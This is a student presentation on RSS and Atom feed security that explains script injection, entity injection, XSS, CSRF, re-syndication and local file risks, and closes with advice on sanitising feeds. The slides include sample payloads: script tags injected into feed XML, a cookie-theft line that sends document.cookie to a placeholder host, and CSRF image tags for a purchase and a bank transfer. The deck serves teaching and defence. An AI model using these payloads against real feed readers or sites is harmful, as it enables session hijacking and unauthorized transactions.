An analysis of RSS security

1. An analysis of RSS security Research Topic Network Security CmpE 209 Dr.Richard Sinn Sarbjeet Singh (005886296) Uma Nandanam (006259825)

2. Introduction • RSS (Really Simple Syndication or Rich Site Summary) is new and efficient content distribution feature using XML format. • RSS is used to distribute information (stores/news/articles, blog posts, video clips, audio clips etc) on a topic you choose on your favorite website. You need to subscribe to receive this information (called RSS feeds) • This RSS feed come to you and a reader on your computer read this information. The reader could be a stand alone s/w or web based. • Using RSS we don’t waist time looking for the info you need on the websites or wait for the pages to load. • To subscribe to a feed look for a buttons like this on your favorite website • To Subscribe to SJSU for RSS feeds: www.sjsu.edu/rss

3. RSS Security Vulnerabilities • RSS Security Vulnerabilities • The major RSS security vulnerabilities involve the elements of the feeds. • RSS: feed titles, Item description, Item title, Item link, Item description XML elements. • Atom: Author name, Entry update element, Feed title, Feed sub-title, Feed update • Attackers can inject scripts to these elements. • A few threats: • Phishing (To redirect a user to a malicious website) • Stealing Cookies • Deploying malware • Browser Activity Monitoring

4. RSS Security Vulnerabilities (Contd.,) HTML literal injections • RSS specifications specify ‘<description>’ tag to allow html entities to comply with html formatting.  However, the specifications do not specify the use of literal html tags inclusions • The Readers treat  “<>” as literals. When a feed contains html tags, in certain cases, the content is displayed literally •  RSS readers or aggregators treat these tags as literals, they execute the scripts (engineered by the attacker) in the feed <?xml version="1.0" encoding="ISO-8859-1"?> <rss version="2.0"> <channel> <title>The title of my RSS 2.0 Feed</title> <link>http://www.vaishnavinandanam.com/</link> <description> <script>alert('Description of feed')</script> </description> <lastBuildDate>Tu, 21 April 2009 18:30:00 GMT</lastBuildDate> <language>en-us</language> <title> <script>alert('Title of an item')</script> </title> <link>http://vaishnavinandanam.com/item/RSS</link> <guid>http:// vaishnavinandanam.com/item/RSS</guid> <pubDate> Tu, 21 April 2009 18:30:00 GMT</pubDate> <description>[CDATA[ This is the description about RSS security examples ]]</description> </item> </channel> </rss>

5. RSS Security Vulnerabilities (Contd.,) HTML entity injections • Some readers convert HTML entities of the feed to their true values. Potential script injections are inserted in the feeds.The RSS readers convert &lt to '<' and &gt to '>‘, the content is added and viewed by the browser component. Most of the readers store this content to a file in the local directories <title> &lt;script&gt;alert(‘Item Title')&lt;/script&gt; </title> <link>http://host/?&lt;script&gt;alert(‘Item Link')&lt;/script&gt; </link> <description>&lt;script&gt;alert(‘Item Description')&lt;/script&gt; </description> Cross site scripting: • Today most of the web 2.0 sites deliver dynamic contents, Using web based readers can lead Cross site scripting (also called as CSS or XSS) • Examples: Hijacking of accounts, changing the user settings, stealing cookie, theft and false advertising. • stealing cookies from the online web reader <description> <script>document.location='.http://abc/cgi-bin/cookie.cgi? '%20+document.cookie</script>

6. RSS Security Vulnerabilities (Contd.,) Cross site request forgery (CSRF) • Unauthorized commands are transmitted from a user that the website trusts • Example-1: An attacker can make your computer send requests to a web site using CSRF attacks • The attacker can inject a tag '<image src>' into the feed, and make your computer connect to a website, perform web actions <description> <img src="https://store.vaishnavi.com/buy?item=stamps&quantity=989"> </description> • Example-2: • You are accessing a blog site and accessing a malicious feed • This feed has a malicious JavaScript that can capture the keystocks from your computer and rely it attacker's host • Example-3: • You login to bank.com and authenticate. At the same time you also download a malicious feed<img src= “http://bank.com/transfer?to_account=my_account_number&amount=all_of_your_money> • A request is issued from your( you became the victim) browser to the bank’s website for transfer on money.

7. RSS Security Vulnerabilities (Contd.,) Re-syndication Venerability • Server-1 stores a malicious feed, this feed is downloaded by the subscribers including other servers (server-2 and server-3) • Servers-2 and 3 creates a web feed including server-1's feed content without sanitizing it • This content on server-2 and 3 is downloaded by the respective subscribers of Server2 and 3 • In this process of re-syndicating, many clients get effected. Server-2 Feed also includes Server-1 feed Server-1 stores malicious feed I N T E R N E T Server-3 Feed also includes Server-1 feed

8. RSS Security Vulnerabilities (Contd.,) Local zone risks • Effects the subscriber’s system. Readers typically convert the feed into an html file and store it in a local directory • This file is loaded on to a browser instance. This file can have ActiveX objects with permissions to read/write files to the disk • This feed can be engineered to read a local file and send a copy to a the attacker’s intended host in the Internet. RSS Spam • Keyword surfing • Link farms • Fake RSS feeds • How to protect: • A user can unsubscribe for the feed

9. Conclusions Venurabilites are becasuse of: • Feed is malicious • The site that provides the feed is hacked. • The webbased feed is created from mailing lists, bulletin boards messages, p2p • Feed is modified during transport • It is extremely difficult to safely consume RSS feed • The feed elements such as the <description> element allow arbitrary encoded html • Arbitrary codes can carry venerable payloads • RSS readers should remove html entities and meta characters before displaying the feed to the user. Sanitize the feed by looking and stripoff venurable tages. • Knowing the security implications regarding feeds and readers will help you avoid some things such as CSS • Before displaying the feed a safe RSS reader can strip tags such as, script, embed, object, frameset, meta, link, style etc • Attackers don’t just expore weaknesses on server but also on client. Client-side vernubilities: engineer scripts in the feed and extract information • In the case of feed readers, ensure that scripts, applets, and plug-ins are disabled • Regular expressions can be used to filter script tags from user-supplied inputs

10. References • [1] Zero Day Subscriptions: Using RSS and Atom Feeds As Attack Delivery Systems by: Bob Auger (Presented at Black Hat USA 2006) http://h71028.www7.hp.com/enterprise/downloads/BobAuger-RSS_Security.pdf • [2] Blackhat 2006 RSS Security resourcesVideo presentation: http://media.blackhat.com/bh-usa-06/video/2006_BlackHat_Vegas-V36-Auger_and_Sima-0day_subscriptions.mp4 (Video Presentation)Slides: http://www.cgisecurity.com/papers/RSS-Security.ppt Paper: http://www.cgisecurity.com/papers/HackingFeeds.pdf • [3] Feed Injection in Web 2.0: Hacking RSS and Atom Feed Implementations http://www.cgisecurity.com/papers/HackingFeeds.pdf • [4] Zero Day Subscriptions: Using RSS and Atom Feeds As Attack Delivery Systemshttp://www.cgisecurity.com/papers/RSS-Security.ppt • [5] RSS Specificationhttp://www.rss-specifications.com/rss-specifications.htm • [6] Rss security realted papershttp://www.cgisecurity.com/papers/ • [7] The Cross-Site Scripting (XSS) FAQhttp://www.cgisecurity.com/xss-faq.html • [8] CGISecurity Article: The Cross-Site Request Forgery FAQhttp://www.cgisecurity.com/csrf-faq.html

11. “Things that think…don’t make sense unless they link.” - Nicholas Negroponte, MIT Media Laboratory